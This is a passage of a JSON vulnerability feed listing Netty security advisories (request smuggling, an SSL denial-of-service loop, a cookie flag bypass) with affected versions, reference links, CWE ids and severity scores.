"https://lists.apache.org/thread.html/rf803b65b4a57589d79cf2e83d8ece0539018d32864f932f63c972844@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9f8bcc4ca8d2788f77455ff594468404732a4497baebe319043f4d5@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfd173eac20d5e5f581c8984b685c836dafea8eb2f7ff85f617704cf1@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff8859c0d06b1688344b39097f9685c43b461cf2bc41f60f001704e9@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201223-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.45.Final...netty-4.1.46.Final" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r14446ed58208cb6d97b6faa6ebf145f1cf2c70c0886c0c133f4d3b6f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r255ed239e65d0596812362adc474bee96caf7ba042c7ad2f3c62cec7@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r281882fdf9ea89aac02fd2f92786693a956aac2ce9840cce87c7df6b@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2958e4d49ee046e1e561e44fdc114a0d2285927501880f15852a9b53@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31424427cc6d7db46beac481bdeed9a823fc20bb1b9deede38557f71@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3195127e46c87a680b5d1d3733470f83b886bfd3b890c50df718bed1@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3ea4918d20d0c1fa26cac74cc7cda001d8990bc43473d062867ef70d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a7e4e23bd84ac24abf30ab5d5edf989c02b555e1eca6a2f28636692@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f4a14d6a608db447b725ec2e96c26ac9664d83cd879aa21e2cfeb24@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5030cd8ea5df1e64cf6a7b633eff145992fbca03e8bfc687cd2427ab@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5a0b1f0b1c3bcd66f5177fbd6f6de2d0f8cae24a13ab2669f274251a@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b1ad61552591b747cd31b3a908d5ff2e8f2a8a6847583dd6b7b1ee7@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r69b23a94d4ae45394cabae012dd1f4a963996869c44c478eb1c61082@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7641ee788e1eb1be4bb206a7d15f8a64ec6ef23e5ec6132d5a567695@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7836bbdbe95c99d4d725199f0c169927d4e87ba57e4beeeb699c097a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r866288c2ada00ce148b7307cdf869f15f24302b3eb2128af33830997@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88e2b91560c065ed67e62adf8f401c417e4d70256d11ea447215a70c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8a654f11e1172b0effbfd6f8d5b6ca651ae4ac724a976923c268a42f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9addb580456807cd11d6f0c6b6373b7d7161d06d2278866c30c7febb@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-119", "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T19:58:52Z", "nvd_published_at": "2020-04-07T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p2v9-g2qv-p635", "published": "2020-02-21T18:55:04Z", "modified": "2024-12-08T05:34:35.794525Z", "aliases": [ "CVE-2019-20445" ], "related": [ "CGA-3hw4-v37p-xv4c", "CGA-f836-4mqx-vr2w" ], "summary": "HTTP Request Smuggling in Netty", "details": "HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.45" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20445" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9861" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9865" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4532-1" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:25Z", "nvd_published_at": "2020-01-29T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-rv63-gqm8-9w8q", "published": "2022-05-13T01:11:43Z", "modified": "2024-02-16T08:13:46.004283Z", "aliases": [ "CVE-2016-4970" ], "summary": "Loop with Unreachable Exit Condition in Netty", "details": "handler/ssl/OpenSslEngine.java in Netty 4.0.x before 4.0.37.Final and 4.1.x before 4.1.1.Final allows remote attackers to cause a denial of service (infinite loop).", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.Alpha1" }, { "fixed": "4.0.37.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rv63-gqm8-9w8q/GHSA-rv63-gqm8-9w8q.json" } }, { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.0.Beta1" }, { "fixed": "4.1.1.Final" } ] } ], "versions": [ "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-rv63-gqm8-9w8q/GHSA-rv63-gqm8-9w8q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4970" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/5364" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1343616" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/afaa5860e3a6d327eb96c3d82cbd2f5996de815a16854ed1ad310144@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://wiki.opendaylight.org/view/Security_Advisories" }, { "type": "WEB", "url": "http://netty.io/news/2016/06/07/4-0-37-Final.html" }, { "type": "WEB", "url": "http://netty.io/news/2016/06/07/4-1-1-Final.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0179.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-1097.html" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:54:08Z", "nvd_published_at": "2017-04-13T14:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xfv3-rrfm-f2rv", "published": "2020-06-30T21:01:21Z", "modified": "2024-02-16T08:04:08.954640Z", "aliases": [ "CVE-2015-2156" ], "summary": "Information Exposure in Netty", "details": "Netty before 3.9.8.Final, 3.10.x before 3.10.3.Final, 4.0.x before 4.0.28.Final, and 4.1.x before 4.1.0.Beta5 and Play Framework 2.x before 2.3.9 might allow remote attackers to bypass the httpOnly flag on cookies and obtain sensitive information by leveraging improper validation of cookie name and value characters.", "affected": [ { "package": { "name": "io.netty:netty-parent", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.28.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.3.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": "3.10.3.Final" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": "3.10.3.Final" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final" ], "database_specific": { "source": 